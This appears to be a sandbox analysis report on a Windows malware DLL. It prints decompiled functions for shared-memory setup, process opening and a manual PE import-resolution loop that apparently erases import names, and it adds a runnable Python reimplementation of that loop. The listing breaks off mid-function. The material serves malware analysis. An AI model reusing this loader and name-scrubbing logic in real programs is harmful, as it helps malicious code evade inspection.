                                                                					SetThreadPriority(_t13, 0xffffffff); // executed
                                                                				}
                                                                				_t4 = E10001540(_a4); // executed
                                                                				_t9 = _t4;
                                                                				if(_t9 == 0) {
                                                                					SetThreadPriority(_t13, _t4);
                                                                				}
                                                                				asm("lock xadd [eax], ecx");
                                                                				return _t9;
                                                                			}

                                                                APIs
                                                                • GetCurrentThread.KERNEL32 ref: 10001CEA
                                                                • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 10001CF5
                                                                • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 10001D08
                                                                • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 10001D1B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 00000000.00000002.805526913.0000000010005000.00000040.00020000.sdmp
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Thread$Priority$AffinityCurrentMask
                                                                • String ID:
                                                                • API String ID: 1452675757-0
                                                                • Opcode ID: 7978bd262e6d19c09d6aa4656baac92db8beb5a3c6207d51bcb1c2b168639f40
                                                                • Instruction ID: e4b3be2930a2d30c1a8d1367e94e89244ea36a12442c579d3d569057e20ce27f
                                                                • Opcode Fuzzy Hash: 7978bd262e6d19c09d6aa4656baac92db8beb5a3c6207d51bcb1c2b168639f40
                                                                • Instruction Fuzzy Hash: 9BE092313076216BF2126B294CC4EAB679CEF913F17124226F621922E4DF548C0189A5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E1000169A() {
                                                                				char _v16;
                                                                				intOrPtr _v28;
                                                                				void _v32;
                                                                				void* _v36;
                                                                				intOrPtr _t15;
                                                                				void* _t16;
                                                                				long _t25;
                                                                				int _t26;
                                                                				intOrPtr* _t32;
                                                                				signed int _t36;
                                                                				intOrPtr _t39;
                                                                
                                                                				_t15 =  *0x10004144;
                                                                				if( *0x1000412c > 5) {
                                                                					_t16 = _t15 + 0x100050f9;
                                                                				} else {
                                                                					_t16 = _t15 + 0x100050b1;
                                                                				}
                                                                				E1000196B(_t16, _t16);
                                                                				_t36 = 6;
                                                                				memset( &_v32, 0, _t36 << 2);
                                                                				if(E100012DC( &_v32,  &_v16,  *0x10004140 ^ 0xf7a71548) == 0) {
                                                                					_t25 = 0xb;
                                                                				} else {
                                                                					_t26 = lstrlenW( *0x10004138);
                                                                					_t8 = _t26 + 2; // 0x2
                                                                					_t11 = _t26 + _t8 + 8; // 0xa
                                                                					if(E10001E13(_t39, _t11,  &_v32,  &_v36) == 0) {
                                                                						_t32 = _v36;
                                                                						 *_t32 = 0;
                                                                						if( *0x10004138 == 0) {
                                                                							 *((short*)(_t32 + 4)) = 0;
                                                                						} else {
                                                                							E10002070(_t44, _t32 + 4);
                                                                						}
                                                                					}
                                                                					_t25 = E100010F9(_v28); // executed
                                                                				}
                                                                				ExitThread(_t25);
                                                                 			}

                                                                0x100016a0
                                                                0x100016b1
                                                                0x100016bb
                                                                0x100016b3
                                                                0x100016b3
                                                                0x100016b3
                                                                0x100016c2
                                                                0x100016cb
                                                                0x100016d0
                                                                0x100016ee
                                                                0x1000174a
                                                                0x100016f0
                                                                0x100016f6
                                                                0x100016fc
                                                                0x1000170a
                                                                0x10001715
                                                                0x1000171e
                                                                0x10001722
                                                                0x10001728
                                                                0x10001739
                                                                0x1000172a
                                                                0x10001730
                                                                0x10001730
                                                                0x10001728
                                                                0x10001741
                                                                0x10001741
                                                                0x1000174c

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                 • Associated: 00000000.00000002.805526913.0000000010005000.00000040.00020000.sdmp
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExitThreadlstrlen
                                                                • String ID:
                                                                • API String ID: 2636182767-0
                                                                • Opcode ID: b2274092c8445685ec2cd76520e0405317c363aced49d941c636058f159a5ac8
                                                                • Instruction ID: 0cf49a4b4e23d9d9ae1aa408ad671cdcffb1bf156085d6e57ed5d2e430731b0c
                                                                • Opcode Fuzzy Hash: b2274092c8445685ec2cd76520e0405317c363aced49d941c636058f159a5ac8
                                                                • Instruction Fuzzy Hash: 09116DB1508305ABF721DBA4CC99ECB77ECEB043C1F024926F555D3169EB30E6448B55
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 37%
                                                                			E1000196B(void* __eax, intOrPtr _a4) {
                                                                
                                                                				 *0x10004150 =  *0x10004150 & 0x00000000;
                                                                				_push(0);
                                                                				_push(0x1000414c);
                                                                				_push(1);
                                                                				_push(_a4);
                                                                				 *0x10004148 = 0xc; // executed
                                                                				L10002010(); // executed
                                                                				return __eax;
                                                                			}



                                                                0x1000196b
                                                                0x10001972
                                                                0x10001974
                                                                0x10001979
                                                                0x1000197b
                                                                0x1000197f
                                                                0x10001989
                                                                0x1000198e

                                                                APIs
                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(100016C7,00000001,1000414C,00000000), ref: 10001989
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                 • Associated: 00000000.00000002.805526913.0000000010005000.00000040.00020000.sdmp
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DescriptorSecurity$ConvertString
                                                                • String ID:
                                                                • API String ID: 3907675253-0
                                                                • Opcode ID: 1993c95c5950e5545ff5e0ff84ea07d39106e86980e244a61008a792b8d983ba
                                                                • Instruction ID: 282e5bb9558e7c36415e3b38fee0fcfa39ed5af610658c9955217df824f70e77
                                                                • Opcode Fuzzy Hash: 1993c95c5950e5545ff5e0ff84ea07d39106e86980e244a61008a792b8d983ba
                                                                • Instruction Fuzzy Hash: EBC04CF8140750A7F620DB408C85FC57A51B7A4785F120504F650251E9CBB510D4951D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                C-Code - Quality: 68%
                                                                			E10001E13(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                				intOrPtr _v12;
                                                                				struct _FILETIME* _v16;
                                                                				short _v60;
                                                                				struct _FILETIME* _t14;
                                                                				intOrPtr _t15;
                                                                				long _t18;
                                                                				void* _t22;
                                                                				intOrPtr _t31;
                                                                				long _t32;
                                                                				void* _t34;
                                                                
                                                                				_t31 = __edx;
                                                                				_t14 =  &_v16;
                                                                				GetSystemTimeAsFileTime(_t14);
                                                                				_push(0x192);
                                                                				_push(0x54d38000);
                                                                				_push(_v12);
                                                                				_push(_v16);
                                                                				L10002160();
                                                                				_push(_t14);
                                                                				_v16 = _t14;
                                                                				_t15 =  *0x10004144;
                                                                				_push(_t15 + 0x1000505e);
                                                                				_push(_t15 + 0x10005054);
                                                                				_push(0x16);
                                                                				_push( &_v60);
                                                                				_v12 = _t31;
                                                                				L1000215A();
                                                                				_t18 = _a4;
                                                                				if(_t18 == 0) {
                                                                					_t18 = 0x1000;
                                                                				}
                                                                				_t34 = CreateFileMappingW(0xffffffff, 0x10004148, 4, 0, _t18,  &_v60);
                                                                				if(_t34 == 0) {
                                                                					_t32 = GetLastError();
                                                                				} else {
                                                                					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                                						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
                                                                						if(_t22 == 0) {
                                                                							_t32 = GetLastError();
                                                                							if(_t32 != 0) {
                                                                								goto L9;
                                                                							}
                                                                						} else {
                                                                							 *_a8 = _t34;
                                                                							 *_a12 = _t22;
                                                                							_t32 = 0;
                                                                						}
                                                                					} else {
                                                                						_t32 = 2;
                                                                						L9:
                                                                						CloseHandle(_t34);
                                                                					}
                                                                				}
                                                                				return _t32;
                                                                 			}

                                                                0x10001e13
                                                                0x10001e1c
                                                                0x10001e20
                                                                0x10001e26
                                                                0x10001e2b
                                                                0x10001e30
                                                                0x10001e33
                                                                0x10001e36
                                                                0x10001e3b
                                                                0x10001e3c
                                                                0x10001e3f
                                                                0x10001e4a
                                                                0x10001e51
                                                                0x10001e55
                                                                0x10001e57
                                                                0x10001e58
                                                                0x10001e5b
                                                                0x10001e60
                                                                0x10001e6a
                                                                0x10001e6c
                                                                0x10001e6c
                                                                0x10001e86
                                                                0x10001e8a
                                                                0x10001eda
                                                                0x10001e8c
                                                                0x10001e95
                                                                0x10001eab
                                                                0x10001eb3
                                                                0x10001ec5
                                                                0x10001ec9
                                                                0x00000000
                                                                0x00000000
                                                                0x10001eb5
                                                                0x10001eb8
                                                                0x10001ebd
                                                                0x10001ebf
                                                                0x10001ebf
                                                                0x10001ea0
                                                                0x10001ea2
                                                                0x10001ecb
                                                                0x10001ecc
                                                                0x10001ecc
                                                                0x10001e95
                                                                0x10001ee2

                                                                APIs
                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,10001713,0000000A,?,?), ref: 10001E20
                                                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 10001E36
                                                                • _snwprintf.NTDLL ref: 10001E5B
                                                                • CreateFileMappingW.KERNEL32(000000FF,10004148,00000004,00000000,?,?), ref: 10001E80
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,10001713,0000000A,?), ref: 10001E97
                                                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 10001EAB
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,10001713,0000000A,?), ref: 10001EC3
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,10001713,0000000A), ref: 10001ECC
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,10001713,0000000A,?), ref: 10001ED4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                 • Associated: 00000000.00000002.805526913.0000000010005000.00000040.00020000.sdmp
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                • String ID:
                                                                • API String ID: 1724014008-0
                                                                • Opcode ID: 6494f7ae6f62221055e60181491e3fe6bbbf159ec9462afcbb4831df1b3ad40a
                                                                • Instruction ID: 254ce7f55be2e700fe156080e3ad539a5a5a63b5fbf22f3b945be7b030c8b019
                                                                • Opcode Fuzzy Hash: 6494f7ae6f62221055e60181491e3fe6bbbf159ec9462afcbb4831df1b3ad40a
                                                                • Instruction Fuzzy Hash: A7217FB6A00158AFF711EFA4CC84EDF77ADEB483D1F218029FA15D7194DA7099418B60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E10001EE5() {
                                                                				void* _t1;
                                                                				unsigned int _t3;
                                                                				void* _t4;
                                                                				long _t5;
                                                                				void* _t6;
                                                                				intOrPtr _t10;
                                                                				void* _t14;
                                                                
                                                                				_t10 =  *0x10004130;
                                                                				_t1 = CreateEventA(0, 1, 0, 0);
                                                                				 *0x1000413c = _t1;
                                                                				if(_t1 == 0) {
                                                                					return GetLastError();
                                                                				}
                                                                				_t3 = GetVersion();
                                                                				if(_t3 != 5) {
                                                                					L4:
                                                                					if(_t14 <= 0) {
                                                                						_t4 = 0x32;
                                                                						return _t4;
                                                                					} else {
                                                                						goto L5;
                                                                					}
                                                                				} else {
                                                                					if(_t3 >> 8 > 0) {
                                                                						L5:
                                                                						 *0x1000412c = _t3;
                                                                						_t5 = GetCurrentProcessId();
                                                                						 *0x10004128 = _t5;
                                                                						 *0x10004130 = _t10;
                                                                						_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                						 *0x10004124 = _t6;
                                                                						if(_t6 == 0) {
                                                                							 *0x10004124 =  *0x10004124 | 0xffffffff;
                                                                						}
                                                                						return 0;
                                                                					} else {
                                                                						_t14 = _t3 - _t3;
                                                                						goto L4;
                                                                					}
                                                                				}
                                                                 			}

                                                                0x10001ee6
                                                                0x10001ef4
                                                                0x10001efa
                                                                0x10001f01
                                                                0x10001f58
                                                                0x10001f58
                                                                0x10001f03
                                                                0x10001f0b
                                                                0x10001f18
                                                                0x10001f18
                                                                0x10001f54
                                                                0x10001f56
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x10001f0d
                                                                0x10001f14
                                                                0x10001f1a
                                                                0x10001f1a
                                                                0x10001f1f
                                                                0x10001f2d
                                                                0x10001f32
                                                                0x10001f38
                                                                0x10001f3e
                                                                0x10001f45
                                                                0x10001f47
                                                                0x10001f47
                                                                0x10001f51
                                                                0x10001f16
                                                                0x10001f16
                                                                0x00000000
                                                                0x10001f16
                                                                0x10001f14

                                                                APIs
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,1000154B), ref: 10001EF4
                                                                • GetVersion.KERNEL32 ref: 10001F03
                                                                • GetCurrentProcessId.KERNEL32 ref: 10001F1F
                                                                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 10001F38
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                 • Associated: 00000000.00000002.805526913.0000000010005000.00000040.00020000.sdmp
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CreateCurrentEventOpenVersion
                                                                • String ID:
                                                                • API String ID: 845504543-0
                                                                • Opcode ID: 30991713d34a36b48364b3d9eb425c50554a7358dc8637d6b5eee2527c28cd1a
                                                                • Instruction ID: ea10dc5c802a680a8ba8bb0f8edc734978800e41233c6741bbe9ab65d3b2f1fa
                                                                • Opcode Fuzzy Hash: 30991713d34a36b48364b3d9eb425c50554a7358dc8637d6b5eee2527c28cd1a
                                                                • Instruction Fuzzy Hash: 77F0C2B0641332DBF7019F68AD9A7D63BE4E7097D2F028125F641C61ECDBB084918B5C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E10001753(void* __edi, intOrPtr _a4) {
                                                                				signed int _v8;
                                                                				intOrPtr* _v12;
                                                                				_Unknown_base(*)()** _v16;
                                                                				signed int _v20;
                                                                				signed short _v24;
                                                                				struct HINSTANCE__* _v28;
                                                                				intOrPtr _t43;
                                                                				intOrPtr* _t45;
                                                                				intOrPtr _t46;
                                                                				struct HINSTANCE__* _t47;
                                                                				intOrPtr* _t49;
                                                                				intOrPtr _t50;
                                                                				signed short _t51;
                                                                				_Unknown_base(*)()* _t53;
                                                                				CHAR* _t54;
                                                                				_Unknown_base(*)()* _t55;
                                                                				void* _t58;
                                                                				signed int _t59;
                                                                				_Unknown_base(*)()* _t60;
                                                                				intOrPtr _t61;
                                                                				intOrPtr _t65;
                                                                				signed int _t68;
                                                                				void* _t69;
                                                                				CHAR* _t71;
                                                                				signed short* _t73;
                                                                
                                                                				_t69 = __edi;
                                                                				_v20 = _v20 & 0x00000000;
                                                                				_t59 =  *0x10004140;
                                                                				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
                                                                				if(_t43 != 0) {
                                                                					_t45 = _t43 + __edi;
                                                                					_v12 = _t45;
                                                                					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                                                					if(_t46 != 0) {
                                                                						while(1) {
                                                                							_t71 = _t46 + _t69;
                                                                							_t47 = LoadLibraryA(_t71);
                                                                							_v28 = _t47;
                                                                							if(_t47 == 0) {
                                                                								break;
                                                                							}
                                                                							_v24 = _v24 & 0x00000000;
                                                                							 *_t71 = _t59 - 0x69b25f44;
                                                                							_t49 = _v12;
                                                                							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                                                							_t50 =  *_t49;
                                                                							if(_t50 != 0) {
                                                                								L6:
                                                                								_t73 = _t50 + _t69;
                                                                								_v16 = _t61 + _t69;
                                                                								while(1) {
                                                                									_t51 =  *_t73;
                                                                									if(_t51 == 0) {
                                                                										break;
                                                                									}
                                                                									if(__eflags < 0) {
                                                                										__eflags = _t51 - _t69;
                                                                										if(_t51 < _t69) {
                                                                											L12:
                                                                											_t21 =  &_v8;
                                                                											 *_t21 = _v8 & 0x00000000;
                                                                											__eflags =  *_t21;
                                                                											_v24 =  *_t73 & 0x0000ffff;
                                                                										} else {
                                                                											_t65 = _a4;
                                                                											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                                                											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                                                												goto L12;
                                                                											} else {
                                                                												goto L11;
                                                                											}
                                                                										}
                                                                									} else {
                                                                										_t51 = _t51 + _t69;
                                                                										L11:
                                                                										_v8 = _t51;
                                                                									}
                                                                									_t53 = _v8;
                                                                									__eflags = _t53;
                                                                									if(_t53 == 0) {
                                                                										_t54 = _v24 & 0x0000ffff;
                                                                									} else {
                                                                										_t54 = _t53 + 2;
                                                                									}
                                                                									_t55 = GetProcAddress(_v28, _t54);
                                                                									__eflags = _t55;
                                                                									if(__eflags == 0) {
                                                                										_v20 = _t59 - 0x69b25ec5;
                                                                									} else {
                                                                										_t68 = _v8;
                                                                										__eflags = _t68;
                                                                										if(_t68 != 0) {
                                                                											 *_t68 = _t59 - 0x69b25f44;
                                                                										}
                                                                										 *_v16 = _t55;
                                                                										_t58 = 0x593682f4 + _t59 * 4;
                                                                										_t73 = _t73 + _t58;
                                                                										_t32 =  &_v16;
                                                                										 *_t32 = _v16 + _t58;
                                                                										__eflags =  *_t32;
                                                                										continue;
                                                                									}
                                                                									goto L23;
                                                                								}
                                                                							} else {
                                                                								_t50 = _t61;
                                                                								if(_t61 != 0) {
                                                                									goto L6;
                                                                								}
                                                                							}
                                                                							L23:
                                                                							_v12 = _v12 + 0x14;
                                                                							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                                                							if(_t46 != 0) {
                                                                								continue;
                                                                							} else {
                                                                							}
                                                                							L26:
                                                                							goto L27;
                                                                						}
                                                                						_t60 = _t59 + 0x964da13a;
                                                                						__eflags = _t60;
                                                                						_v20 = _t60;
                                                                						goto L26;
                                                                					}
                                                                				}
                                                                				L27:
                                                                				return _v20;
                                                                			}
Instruction addresses for the listing above (the per-line address column was detached from the C-code during extraction): 0x10001753 to 0x1000185b.

                                                                APIs
                                                                • LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 1000178B
                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 100017FD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.805526913.0000000010005000.00000040.00020000.sdmp
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID:
                                                                • API String ID: 2574300362-0
                                                                • Opcode ID: 719e1af3a538566be693e02a9281a347347f2200d9d76fa5ba7df30f4bf57b7f
                                                                • Instruction ID: 50a551485af94626e36314b7bf6b70129b1ae1d3f994bda35dae46301a5f1ec2
                                                                • Opcode Fuzzy Hash: 719e1af3a538566be693e02a9281a347347f2200d9d76fa5ba7df30f4bf57b7f
                                                                • Instruction Fuzzy Hash: 28315E75A0520ADFEB54CF59C890AEEB7F9FF04390B21816DD905E7248EB70DA41CB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%
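The loop listed above is an import-resolution walk over IMAGE_IMPORT_DESCRIPTOR entries of a manually mapped image: `_a4` is the IMAGE_NT_HEADERS pointer (import directory RVA read at +0x80, SizeOfImage at +0x50), `_t69` (edi) is the image base, descriptors are 0x14 bytes with the DLL name RVA at +0xc, OriginalFirstThunk at +0 and FirstThunk at +0x10, and a thunk whose sign bit is set is resolved by ordinal while any other thunk is an RVA to a hint/name entry whose name begins 2 bytes in. A failed LoadLibraryA ends the walk with an error value; a failed GetProcAddress records one and continues with the next descriptor. The stride, offsets and error codes are folded into arithmetic on the global at 0x10004140 and cannot be read off this listing. Note also that after each successful lookup the code stores into the hint/name entry it just used (`*_t68 = ...`) and, after LoadLibraryA, into the DLL name (`*_t71 = ...`), which is consistent with scrubbing import names once they have been resolved, although the stored value is not recoverable here. The Python below reproduces the walk on a constructed in-memory image, with a dictionary standing in for LoadLibraryA/GetProcAddress so it runs offline. It is an added example, not code from this report or from the sample; the module names, addresses and error codes in it are made up.

```python
"""Import-directory walk mirroring the decompiled loop (added example)."""
import struct

DESC_SIZE = 0x14            # sizeof(IMAGE_IMPORT_DESCRIPTOR)
ORDINAL_FLAG = 0x80000000   # IMAGE_ORDINAL_FLAG32 (the sign-bit test in the listing)
IMPORT_DIR_OFF = 0x80       # IMAGE_NT_HEADERS32 -> DataDirectory[IMPORT].VirtualAddress
SIZEOF_IMAGE_OFF = 0x50     # IMAGE_NT_HEADERS32 -> OptionalHeader.SizeOfImage
ERR_LOAD, ERR_PROC = 1, 2   # stand-ins; the sample derives its codes from a global


def _cstr(image, off):
    """Read a NUL-terminated ASCII string at `off`."""
    return bytes(image[off:image.index(b"\0", off)]).decode("ascii")


def resolve_imports(image, nt_rva, modules):
    """Fill the IAT of a mapped image in place; returns (status, log).

    `modules` maps DLL name -> {symbol: address} and replaces
    LoadLibraryA/GetProcAddress.  status 0 means every import resolved.
    As in the listing, a failed library load aborts the walk, while a failed
    symbol lookup is recorded and the walk moves on to the next descriptor.
    """
    status, log = 0, []
    size_of_image = struct.unpack_from("<I", image, nt_rva + SIZEOF_IMAGE_OFF)[0]
    desc = struct.unpack_from("<I", image, nt_rva + IMPORT_DIR_OFF)[0]
    if desc == 0:
        return status, log                        # no import directory at all
    while True:
        oft, _stamp, _fwd, name_rva, ft = struct.unpack_from("<5I", image, desc)
        if name_rva == 0 or name_rva >= size_of_image:
            break                                 # all-zero descriptor terminates the table
        dll = _cstr(image, name_rva)
        exports = modules.get(dll)                # LoadLibraryA
        if exports is None:
            return ERR_LOAD, log
        lookup_off = oft or ft                    # prefer OriginalFirstThunk, else FirstThunk
        iat_off = ft
        while lookup_off:
            entry = struct.unpack_from("<I", image, lookup_off)[0]
            if entry == 0:
                break                             # end of this descriptor's thunks
            if entry & ORDINAL_FLAG:
                symbol = entry & 0xFFFF           # IMAGE_ORDINAL(entry)
            else:
                symbol = _cstr(image, entry + 2)  # IMAGE_IMPORT_BY_NAME: u16 hint, then name
            addr = exports.get(symbol)            # GetProcAddress
            if addr is None:
                status = ERR_PROC
                log.append((dll, symbol, None))
                break                             # next descriptor, as the sample does
            struct.pack_into("<I", image, iat_off, addr)   # write the IAT slot
            log.append((dll, symbol, addr))
            lookup_off += 4
            iat_off += 4
        desc += DESC_SIZE
    return status, log


# Constructed addresses standing in for real module exports (not from the sample).
FAKE_MODULES = {
    "KERNEL32.dll": {"LoadLibraryA": 0x7C801D7B, 7: 0x7C80B7A0},
    "USER32.dll": {"MessageBoxA": 0x7E4507EA},
}


def build_sample_image():
    """Constructed image (not the sample): NT headers at 0x100, import directory at 0x200."""
    img = bytearray(0x400)
    struct.pack_into("<I", img, 0x100 + SIZEOF_IMAGE_OFF, 0x400)
    struct.pack_into("<I", img, 0x100 + IMPORT_DIR_OFF, 0x200)
    # descriptor 0: KERNEL32.dll with both OriginalFirstThunk (0x240) and FirstThunk (0x260)
    struct.pack_into("<5I", img, 0x200, 0x240, 0, 0, 0x280, 0x260)
    # descriptor 1: USER32.dll with OriginalFirstThunk == 0, so FirstThunk (0x2A0) is walked
    struct.pack_into("<5I", img, 0x214, 0, 0, 0, 0x290, 0x2A0)
    # descriptor 2 at 0x228 stays all-zero: the terminator
    thunks0 = (0x300, ORDINAL_FLAG | 7, 0)        # import by name, import by ordinal 7, end
    struct.pack_into("<3I", img, 0x240, *thunks0)
    struct.pack_into("<3I", img, 0x260, *thunks0)
    struct.pack_into("<2I", img, 0x2A0, 0x310, 0)
    img[0x280:0x28D] = b"KERNEL32.dll\0"
    img[0x290:0x29B] = b"USER32.dll\0"
    img[0x300:0x30F] = struct.pack("<H", 0x2F5) + b"LoadLibraryA\0"   # hint + name
    img[0x310:0x31E] = struct.pack("<H", 0x1E2) + b"MessageBoxA\0"
    return img


def demo():
    """Resolve the constructed image; returns (status, log, kernel32_iat, user32_iat)."""
    img = build_sample_image()
    status, log = resolve_imports(img, 0x100, FAKE_MODULES)
    k32_iat = struct.unpack_from("<2I", img, 0x260)
    u32_iat = struct.unpack_from("<I", img, 0x2A0)[0]
    return status, log, k32_iat, u32_iat


if __name__ == "__main__":
    for line in demo()[1]:
        print(line)
```

When run against the constructed image the walk fills both IAT slots of KERNEL32.dll (one by name, one by ordinal) and the single USER32.dll slot, and returns status 0. Removing a DLL from the module table stops the walk with ERR_LOAD; removing only a symbol leaves the earlier descriptor's IAT filled and returns ERR_PROC, which is the asymmetry the two failure branches in the listing encode.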

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.795656406.0000000000F00000.00000040.00000010.sdmp, Offset: 00F00000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID: t32c$t32c
                                                                • API String ID: 0-1046649395
                                                                • Opcode ID: 7ee3f6eae238e576769600233bef0f3bd2ce6700d5470fa46275222c547d7dac
                                                                • Instruction ID: 2dc1e10a3529a19a928a27013d7279e76f09d6c63ad8514d11b52adaab1d4663
                                                                • Opcode Fuzzy Hash: 7ee3f6eae238e576769600233bef0f3bd2ce6700d5470fa46275222c547d7dac
                                                                • Instruction Fuzzy Hash: 30E13832A0011AEFDF24CB54CD84BAAB7B5FF88324F1881D5D509A7251DB31AE95EF40
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E100023D5(long _a4) {
                                                                				intOrPtr _v8;
                                                                				intOrPtr _v12;
                                                                				signed int _v16;
                                                                				short* _v32;
                                                                				void _v36;
                                                                				void* _t57;
                                                                				signed int _t58;
                                                                				signed int _t61;
                                                                				signed int _t62;
                                                                				void* _t63;
                                                                				signed int* _t68;
                                                                				intOrPtr* _t69;
                                                                				intOrPtr* _t71;
                                                                				intOrPtr _t72;
                                                                				intOrPtr _t75;
                                                                				void* _t76;
                                                                				signed int _t77;
                                                                				void* _t78;
                                                                				void _t80;
                                                                				signed int _t81;
                                                                				signed int _t84;
                                                                				signed int _t86;
                                                                				short* _t87;
                                                                				void* _t89;
                                                                				signed int* _t90;
                                                                				long _t91;
                                                                				signed int _t93;
                                                                				signed int _t94;
                                                                				signed int _t100;
                                                                				signed int _t102;
                                                                				void* _t104;
                                                                				long _t108;
                                                                				signed int _t110;
                                                                
                                                                				_t108 = _a4;
                                                                				_t76 =  *(_t108 + 8);
                                                                				if((_t76 & 0x00000003) != 0) {
                                                                					L3:
                                                                					return 0;
                                                                				}
                                                                				_a4 =  *[fs:0x4];
                                                                				_v8 =  *[fs:0x8];
                                                                				if(_t76 < _v8 || _t76 >= _a4) {
                                                                					_t102 =  *(_t108 + 0xc);
                                                                					__eflags = _t102 - 0xffffffff;
                                                                					if(_t102 != 0xffffffff) {
                                                                						_t91 = 0;
                                                                						__eflags = 0;
                                                                						_a4 = 0;
                                                                						_t57 = _t76;
                                                                						do {
                                                                							_t80 =  *_t57;
                                                                							__eflags = _t80 - 0xffffffff;
                                                                							if(_t80 == 0xffffffff) {
                                                                								goto L9;
                                                                							}
                                                                							__eflags = _t80 - _t91;
                                                                							if(_t80 >= _t91) {
                                                                								L20:
                                                                								_t63 = 0;
                                                                								L60:
                                                                								return _t63;
                                                                							}
                                                                							L9:
                                                                							__eflags =  *(_t57 + 4);
                                                                							if( *(_t57 + 4) != 0) {
                                                                								_t12 =  &_a4;
                                                                								 *_t12 = _a4 + 1;
                                                                								__eflags =  *_t12;
                                                                							}
                                                                							_t91 = _t91 + 1;
                                                                							_t57 = _t57 + 0xc;
                                                                							__eflags = _t91 - _t102;
                                                                						} while (_t91 <= _t102);
                                                                						__eflags = _a4;
                                                                						if(_a4 == 0) {
                                                                							L15:
                                                                							_t81 =  *0x10004178;
                                                                							_t110 = _t76 & 0xfffff000;
                                                                							_t58 = 0;
                                                                							__eflags = _t81;
                                                                							if(_t81 <= 0) {
                                                                								L18:
                                                                								_t104 = _t102 | 0xffffffff;
                                                                								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                								__eflags = _t61;
                                                                								if(_t61 < 0) {
                                                                									_t62 = 0;
                                                                									__eflags = 0;
                                                                								} else {
                                                                									_t62 = _a4;
                                                                								}
                                                                								__eflags = _t62;
                                                                								if(_t62 == 0) {
                                                                									L59:
                                                                									_t63 = _t104;
                                                                									goto L60;
                                                                								} else {
                                                                									__eflags = _v12 - 0x1000000;
                                                                									if(_v12 != 0x1000000) {
                                                                										goto L59;
                                                                									}
                                                                									__eflags = _v16 & 0x000000cc;
                                                                									if((_v16 & 0x000000cc) == 0) {
                                                                										L46:
                                                                										_t63 = 1;
                                                                										 *0x100041c0 = 1;
                                                                										__eflags =  *0x100041c0;
                                                                										if( *0x100041c0 != 0) {
                                                                											goto L60;
                                                                										}
                                                                										_t84 =  *0x10004178;
                                                                										__eflags = _t84;
                                                                										_t93 = _t84;
                                                                										if(_t84 <= 0) {
                                                                											L51:
                                                                											__eflags = _t93;
                                                                											if(_t93 != 0) {
                                                                												L58:
                                                                												 *0x100041c0 = 0;
                                                                												goto L5;
                                                                											}
                                                                											_t77 = 0xf;
                                                                											__eflags = _t84 - _t77;
                                                                											if(_t84 <= _t77) {
                                                                												_t77 = _t84;
                                                                											}
                                                                											_t94 = 0;
                                                                											__eflags = _t77;
                                                                											if(_t77 < 0) {
                                                                												L56:
                                                                												__eflags = _t84 - 0x10;
                                                                												if(_t84 < 0x10) {
